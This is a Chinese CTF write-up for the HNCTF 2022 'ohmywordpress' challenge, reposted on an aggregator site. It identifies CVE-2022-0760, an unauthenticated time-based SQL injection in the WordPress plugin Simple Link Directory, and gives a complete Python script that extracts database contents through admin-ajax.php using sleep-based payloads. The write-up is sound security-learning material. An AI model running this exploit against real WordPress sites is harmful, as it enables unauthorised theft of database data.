码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • NSS [HNCTF 2022 WEEK2]ohmywordpress(CVE-2022-0760)


    NSS [HNCTF 2022 WEEK2]ohmywordpress(CVE-2022-0760)

    题目描述:flag在数据库里面。

    开题:

    image-20230917120720740

    顺着按钮一直点下去会发现出现一个按钮叫安装WordPress

    image-20230917120830513

    安装完之后的界面,有一个搜索框。

    image-20230917120947976

    F12看看network。

    又出现了这个WordPress,从源码中看出版本是6.0.2。

    image-20230917121044983

    image-20230917123045968

    网上一番搜索,找到一个cve,CVE-2022-0760。当WordPress的插件Simple Link Directory版本 < 7.7.2时候存在时间盲注。

    查看源码,这里确实运用的这个插件,但是看不到版本。

    image-20230917124319477

    估计就是这个CVE,那就直接上盲注脚本。

    import requests
    import time
    
    
    url = "http://node5.anna.nssctf.cn:28982/wp-admin/admin-ajax.php"
    
    result = ""
    for i in range(1, 100):
        length = len(result)
        for o in range(32, 128):
    
            data = {
                "action": "qcopd_upvote_action",
                # "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))={o},sleep(3),0))enz)",
                # "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=substr((select group_concat(schema_name) from information_schema.schemata),26,11)),{i},1))={o},sleep(3),0))enz)",
                "post_id": f"(SELECT 3 FROM (select if(ascii(substr((select group_concat(a) from (select 1 as a union select * from ctftraining.flag)b),{i},1))={o},sleep(3),0))enz)",
            }
    
            time1 = time.time()
    
            res = requests.post(url, data=data)
    
            time2 = time.time()
    
            # print(time2 - time1)
            # exit()
    
            if time2 - time1 > 3:
                result += chr(o)
                print(result)
                break
    
        if len(result) == length:
            break
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13
    • 14
    • 15
    • 16
    • 17
    • 18
    • 19
    • 20
    • 21
    • 22
    • 23
    • 24
    • 25
    • 26
    • 27
    • 28
    • 29
    • 30
    • 31
    • 32
    • 33
    • 34

    image-20230917125858415

    为什么这样写脚本,漏洞利用在下面文章里面能找到。

    image-20230917125035363

    参考文章:

    NSFOCUS绿盟科技

    Simple Link Directory < 7.7.2 - Unauthenticated SQL injection WordPress Security Vulnerability (wpscan.com)

  • 相关阅读:
    RocketMQ系列-搭建Namesrv源码调试环境
    长期稳定的项目—steam搬砖
    Python中unittest的数据驱动
    STL upper_bound和lower_bound函数
    【docker】数据卷和数据卷容器
    压缩冗余信息
    AVB(二):DTO 支持
    别处拿来的VUE项目 npm run serve报错
    centos升级openssh
    vulnhub靶场之WORST WESTERN HOTEL: 1
  • 原文地址:https://blog.csdn.net/Jayjay___/article/details/132956818
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号